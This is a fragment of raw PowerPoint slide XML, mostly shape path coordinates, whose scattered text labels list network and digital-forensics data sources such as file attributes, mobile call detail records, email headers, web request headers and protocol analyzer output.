                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="0466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298947" y="3741420"/>
              <a:ext cx="1255395" cy="577850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255395" h="577850">
                  <a:moveTo>
                    <a:pt x="690499" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="680338" y="30606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094613" y="443864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084066" y="472078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083103" y="501268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091737" y="528554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1109979" y="551052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137025" y="571126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169368" y="577818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202688" y="571126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1232661" y="551052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249870" y="521090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1255077" y="487283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247806" y="453451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227581" y="423417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1201277" y="406201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170685" y="400462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1139142" y="406201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1109979" y="423417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690499" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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340096" y="3692651"/>
              <a:ext cx="5198745" cy="4006850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5198745" h="4006850">
                  <a:moveTo>
                    <a:pt x="1256588" y="3518090"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1251394" y="3484207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234173" y="3454146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204188" y="3434003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170813" y="3427285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138377" y="3434003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111250" y="3454146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093000" y="3476675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084364" y="3504019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1085329" y="3533292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095883" y="3561588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681101" y="3975862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3975862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4006596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691388" y="4006596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111250" y="3582035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140498" y="3599332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172121" y="3605085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202778" y="3599332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229106" y="3582035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249324" y="3551986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256588" y="3518090"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5198745" h="4006850">
                  <a:moveTo>
                    <a:pt x="5198364" y="3853942"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4517263" y="3853942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4102481" y="3439668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113022" y="3411372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113987" y="3382099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105351" y="3354755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="3332226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4059974" y="3312083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4027551" y="3305365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994162" y="3312083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964178" y="3332226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3946969" y="3362287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3941762" y="3396170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3949027" y="3430066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969258" y="3460115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3995572" y="3477412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026230" y="3483165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057853" y="3477412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="3460115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4506976" y="3884676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="3884676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="3853942"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5198745" h="4006850">
                  <a:moveTo>
                    <a:pt x="5198364" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4506976" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="424561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057853" y="407276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026230" y="401510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3995572" y="407276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969258" y="424561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3949027" y="454621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3941762" y="488505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3946969" y="522401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964178" y="552450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994162" y="572604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4027551" y="579310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4059974" y="572604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="552450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105351" y="529932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113987" y="502589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113022" y="473316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4102481" y="445008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517263" y="30734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="30734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="0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88123" y="4768596"/>
              <a:ext cx="1734312" cy="173431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155317" y="3077717"/>
            <a:ext cx="2936875" cy="1701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98755">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="212090" indent="-343535">
              <a:lnSpc>
                <a:spcPts val="2650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Date </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>or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time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dirty="0" sz="22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attributes</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPts val="2540"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000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Extended</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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attributes</a:t>
            </a:r>
            <a:endParaRPr sz="22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  <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pP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-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properties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872978" y="3236213"/>
            <a:ext cx="1995170" cy="10293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2540">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="120" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Mobile</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="12700" marR="5080" indent="3175">
              <a:lnSpc>
                <a:spcPts val="2640"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Call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Detail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Records</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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14">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(CDRs)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761726" y="6675246"/>
            <a:ext cx="3658235" cy="13646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293370">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="94615" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2640"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="8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Internet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header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listing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message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transfer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agents</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2550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Spam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dirty="0" sz="2200" spc="-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analysis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611627" y="7005955"/>
            <a:ext cx="2363470" cy="1031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ts val="2635"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="105" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
            </a:pP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Request</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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response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headers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0544" y="306451"/>
            <a:ext cx="399415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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sources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2476" y="760476"/>
            <a:ext cx="5615939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55647" y="1882292"/>
            <a:ext cx="11739245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22954" marR="5080" indent="-3310890">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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analyzed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at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individual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frames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level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using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summary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statistics.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Network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analysis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tools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devices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include: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05811" y="3493008"/>
            <a:ext cx="5834380" cy="2051685"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5834380" h="2051685">
                <a:moveTo>
                  <a:pt x="5491988" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="341883" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1709419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120" y="1755818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="1800317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="1842510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="1881989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="1918348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="1951180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="1980077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="2004633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="2024441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="2039093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="2048183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341883" y="2051303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5491988" y="2051303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5538386" y="2048183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5582885" y="2039093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5625078" y="2024441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664557" y="2004633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5700916" y="1980077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5733748" y="1951180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762645" y="1918348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5787201" y="1881989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5807009" y="1842510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5821661" y="1800317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830751" y="1755818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5833871" y="1709419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5833871" y="341883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830751" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5821661" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5807009" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5787201" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762645" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5733748" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5700916" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664557" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5625078" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5582885" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5538386" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5491988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485389" y="4034408"/>
            <a:ext cx="5017135" cy="9455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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Pivots</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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12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0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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>per-packet</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>analysis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SzPct val="110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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Extracts</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-6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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>binary</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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65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95955" y="3048000"/>
            <a:ext cx="5053965" cy="678180"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5053965" h="678179">
                <a:moveTo>
                  <a:pt x="4940554" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113030" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69008" y="8874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33083" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8874" y="69008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="113029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="565150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8874" y="609171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33083" y="645096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69008" y="669305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113030" y="678179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4940554" y="678179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4984575" y="669305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5020500" y="645096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5044709" y="609171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5053584" y="565150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5053584" y="113029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5044709" y="69008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5020500" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4984575" y="8874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4940554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439795" y="3193542"/>
            <a:ext cx="35687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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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60" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Analyzer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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125" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Output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395716" y="3493008"/>
            <a:ext cx="5958840" cy="2051685"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5958840" h="2051685">
                <a:moveTo>
                  <a:pt x="5616955" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="341883" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1709419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120" y="1755818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="1800317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="1842510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="1881989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="1918348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="1951180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="1980077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="2004633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="2024441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="2039093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="2048183"/>
